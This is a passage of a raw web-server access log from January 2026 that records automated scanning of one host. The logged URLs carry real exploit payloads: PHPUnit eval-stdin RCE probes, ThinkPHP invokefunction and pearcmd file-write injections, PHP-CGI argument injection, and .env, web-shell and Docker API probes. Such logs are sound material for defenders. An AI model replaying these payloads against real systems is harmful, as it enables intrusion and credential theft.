"/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:20 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:20 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:21 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:22 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:23 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:23 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:24 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:25 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:25 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:26 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:27 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:28 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:28 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:29 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:30 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:31 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:31 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:32 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:33 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:33 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:34 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:35 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:36 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:13:36 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 128.199.103.139] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:03:37:46 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:03:42:02 +0000] 404 - GET http 91.82.83.208 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:03:48:41 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:03:49:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:04:00:57 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 205.210.31.201] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[19/Jan/2026:04:03:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:04:06:25 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=ec8&psd=ec8" [Client 94.243.10.63] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:04:11:56 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.133.139.6] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[19/Jan/2026:04:19:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:04:29:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.149.59.26] [Length 0] [Gzip -] "-" "-" +[19/Jan/2026:04:30:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.149.59.26] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[19/Jan/2026:04:33:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 3.149.59.26] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[19/Jan/2026:04:38:59 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.149.59.26] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:04:40:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:04:40:56 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.149.59.26] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:04:57:09 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:05:02:37 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/6.12 (Linux 2.4.18-14cpq i686; U) [en]" "-" +[19/Jan/2026:05:02:38 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; NABIJR-NV5B Build/JZO54L) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[19/Jan/2026:05:02:38 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; es-AR; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4" "-" +[19/Jan/2026:05:02:38 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6" "-" +[19/Jan/2026:05:02:38 +0000] 404 - GET http 91.82.83.208 "/.env.example" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; TBTE; rv:11.0) like Gecko" "-" +[19/Jan/2026:05:02:39 +0000] 404 - GET http 91.82.83.208 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.4; SM-G900V Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36" "-" +[19/Jan/2026:05:02:39 +0000] 200 - GET http 91.82.83.208 "/?phpinfo=-1" [Client 78.153.140.177] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "-" +[19/Jan/2026:05:02:39 +0000] 200 - GET http 91.82.83.208 "/?url=.env" [Client 78.153.140.177] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux i686; rv:64.0) Gecko/20100101 Firefox/64.0" "-" +[19/Jan/2026:05:18:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:05:23:02 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.37] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:05:24:39 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:05:30:41 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.62.197.227] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:05:38:50 +0000] 404 - GET http 91.82.83.208 "/robots.txt" [Client 91.232.238.106] [Length 150] [Gzip -] "xfa1" "-" +[19/Jan/2026:05:39:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[19/Jan/2026:05:40:42 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:05:46:31 +0000] 200 - GET http 91.82.83.208 "/" [Client 162.216.150.72] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[19/Jan/2026:06:07:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 119.30.70.42] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.1" "-" +[19/Jan/2026:06:10:58 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[19/Jan/2026:06:19:23 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:06:29:48 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 190.129.122.221] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:06:29:49 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 190.129.122.221] [Length 154] [Gzip -] "-" "-" +[19/Jan/2026:06:29:49 +0000] 404 - POST http 91.82.83.208 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:49 +0000] 405 - POST http 91.82.83.208 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 190.129.122.221] [Length 154] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:50 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:50 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:50 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:51 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:51 +0000] 404 - GET http 91.82.83.208 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:51 +0000] 404 - GET http 91.82.83.208 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:52 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:52 +0000] 404 - GET http 91.82.83.208 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:52 +0000] 404 - GET http 91.82.83.208 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:52 +0000] 404 - GET http 91.82.83.208 "/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:53 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:53 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:53 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:54 +0000] 404 - GET http 91.82.83.208 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:54 +0000] 404 - GET http 91.82.83.208 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:54 +0000] 404 - GET http 91.82.83.208 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:54 +0000] 404 - GET http 91.82.83.208 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:55 +0000] 404 - GET http 91.82.83.208 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:55 +0000] 404 - GET http 91.82.83.208 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:55 +0000] 404 - GET http 91.82.83.208 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:56 +0000] 404 - GET http 91.82.83.208 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:56 +0000] 404 - GET http 91.82.83.208 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:57 +0000] 404 - GET http 91.82.83.208 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:57 +0000] 404 - GET http 91.82.83.208 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:57 +0000] 404 - GET http 91.82.83.208 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:58 +0000] 404 - GET http 91.82.83.208 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:58 +0000] 404 - GET http 91.82.83.208 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:58 +0000] 404 - GET http 91.82.83.208 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:59 +0000] 404 - GET http 91.82.83.208 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:59 +0000] 404 - GET http 91.82.83.208 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:29:59 +0000] 404 - GET http 91.82.83.208 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:30:00 +0000] 404 - GET http 91.82.83.208 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:30:00 +0000] 404 - GET http 91.82.83.208 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:30:00 +0000] 404 - GET http 91.82.83.208 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:30:01 +0000] 404 - GET http 91.82.83.208 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:30:01 +0000] 404 - GET http 91.82.83.208 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:30:02 +0000] 404 - GET http 91.82.83.208 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:30:02 +0000] 404 - GET http 91.82.83.208 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:30:02 +0000] 404 - GET http 91.82.83.208 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:30:03 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:30:03 +0000] 403 - GET http 91.82.83.208 "/index.php?lang=../../../../../../../../tmp/index1" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:30:03 +0000] 404 - GET http 91.82.83.208 "/containers/json" [Client 190.129.122.221] [Length 150] [Gzip -] "libredtail-http" "-" +[19/Jan/2026:06:37:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[19/Jan/2026:06:38:35 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[19/Jan/2026:06:40:34 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:35 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/eee.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:35 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/webadmin.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:35 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/galex.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:36 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tinyfilemanager.php?p=" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:36 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class.api.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:36 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/support.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:36 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/themes/finley/min.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dox.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/siteheads.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/0x.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:37 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/images/admin.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-logout.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/87.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/0o0.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:38 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lv.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/dropdown.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wsheet1.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/css/colors/about.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:39 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/size.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ms-users.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-admin/js/about.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/goods.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:40 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/revision.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/12.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-includes/Text/about.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/img.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:41 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tinyfilemanager.php" [Client 4.217.220.52] [Length 150] [Gzip -] "-" "-" +[19/Jan/2026:06:40:42 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/test1.php" [Client 4.217.220.52] [Length 150] [Gzip 